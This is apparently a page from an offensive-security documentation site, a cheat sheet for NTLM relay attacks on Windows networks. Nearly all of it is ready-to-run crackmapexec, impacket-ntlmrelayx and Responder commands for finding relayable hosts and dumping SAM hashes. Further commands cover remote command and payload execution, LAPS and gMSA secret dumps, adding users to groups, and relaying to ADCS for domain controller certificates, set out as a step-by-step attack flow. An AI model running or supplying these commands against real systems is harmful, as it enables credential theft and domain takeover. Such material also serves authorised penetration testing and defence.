Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Capture NTLM authentication and relay to another service. Attacker acts as MITM — victim authenticates to attacker, attacker forwards to target.

Check SMB Signing

crackmapexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt
Targets with SMB signing disabled or not required are relayable.

ntlmrelayx — SMB Relay

Basic (SAM Dump)

impacket-ntlmrelayx -tf targets.txt -smb2support

Execute Command

impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"

Interactive Shell

impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Connect: nc 127.0.0.1 11000

Execute Binary

impacket-ntlmrelayx -tf targets.txt -smb2support -e payload.exe

ntlmrelayx — LDAP Relay

Create Machine Account (RBCD)

impacket-ntlmrelayx -t ldap://DC_IP --delegate-access

Dump LDAP

impacket-ntlmrelayx -t ldap://DC_IP --dump-laps
impacket-ntlmrelayx -t ldap://DC_IP --dump-gmsa

Add User to Group

impacket-ntlmrelayx -t ldap://DC_IP --escalate-user targetuser

ntlmrelayx — MSSQL

impacket-ntlmrelayx -t mssql://SQL_IP -smb2support -q "SELECT system_user"

ntlmrelayx — ADCS (ESC8)

impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce Authentication

Trigger victim to authenticate to attacker:
MethodTool
ResponderLLMNR/NBT-NS poisoning
PetitPotamMS-EFSRPC
PrinterBugMS-RPRN (SpoolService)
DFSCoerceMS-DFSNM
ShadowCoerceMS-FSRVP

Typical Attack Flow

1. Disable SMB/HTTP in Responder (Responder handles poisoning only)
2. Start ntlmrelayx with targets
3. Start Responder
4. Wait for auth → relay → profit

Responder Config

# /etc/responder/Responder.conf
SMB = Off
HTTP = Off

responder -I eth0

Quick Reference

TaskCommand
Find targetscrackmapexec smb SUBNET --gen-relay-list targets.txt
Relay SMBntlmrelayx -tf targets.txt -smb2support
Relay LDAPntlmrelayx -t ldap://DC --delegate-access
Relay ADCSntlmrelayx -t http://CA/certsrv/... --adcs
Exec cmdntlmrelayx -tf targets.txt -c "whoami"